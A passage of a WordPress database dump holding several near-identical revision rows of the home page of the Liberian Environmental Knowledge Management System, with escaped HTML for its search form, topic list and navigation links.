Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">		\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:52:26','2019-11-09 19:52:26','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(546,1,'2019-11-09 19:53:10','2019-11-09 19:53:10','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">		\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:53:10','2019-11-09 19:53:10','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(547,1,'2019-11-09 19:54:10','2019-11-09 19:54:10','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:54:10','2019-11-09 19:54:10','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(548,1,'2019-11-09 19:57:06','2019-11-09 19:57:06','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:57:06','2019-11-09 19:57:06','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(549,1,'2019-11-09 19:57:22','2019-11-09 19:57:22','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:57:22','2019-11-09 19:57:22','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(550,1,'2019-11-09 19:58:22','2019-11-09 19:58:22','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 19:58:22','2019-11-09 19:58:22','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(551,1,'2019-11-09 20:01:51','2019-11-09 20:01:51','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"90\">Topics</option>\n	<option value=\"91\">&nbsp;&nbsp;&nbsp;Action on Climate and Sustainable Development Goals</option>\n	<option value=\"92\">&nbsp;&nbsp;&nbsp;Adaptation and Resilience</option>\n	<option value=\"93\">&nbsp;&nbsp;&nbsp;Agricultural Biodiversity</option>\n	<option value=\"94\">&nbsp;&nbsp;&nbsp;Capacity Building</option>\n	<option value=\"95\">&nbsp;&nbsp;&nbsp;Climate Finance</option>\n	<option value=\"96\">&nbsp;&nbsp;&nbsp;Climate Technology</option>\n	<option value=\"97\">&nbsp;&nbsp;&nbsp;Dry and Sub-humid land Biodiversity</option>\n	<option value=\"98\">&nbsp;&nbsp;&nbsp;Education and Youth</option>\n	<option value=\"99\">&nbsp;&nbsp;&nbsp;Forest Biodiversity</option>\n	<option value=\"100\">&nbsp;&nbsp;&nbsp;Gender</option>\n	<option value=\"101\">&nbsp;&nbsp;&nbsp;Island Biodiversity</option>\n	<option value=\"104\">&nbsp;&nbsp;&nbsp;Land and Climate</option>\n	<option value=\"105\">&nbsp;&nbsp;&nbsp;Land and Drought</option>\n	<option value=\"106\">&nbsp;&nbsp;&nbsp;Land and Human Security</option>\n	<option value=\"107\">&nbsp;&nbsp;&nbsp;Land and Sustainable Development Goals</option>\n	<option value=\"103\">&nbsp;&nbsp;&nbsp;Land Use</option>\n	<option value=\"108\">&nbsp;&nbsp;&nbsp;Local Communities and Indigenous People</option>\n	<option value=\"109\">&nbsp;&nbsp;&nbsp;Marine and Coastal Biodiversity</option>\n	<option value=\"110\">&nbsp;&nbsp;&nbsp;Mitigation</option>\n	<option value=\"111\">&nbsp;&nbsp;&nbsp;Mountain Biodiversity</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and 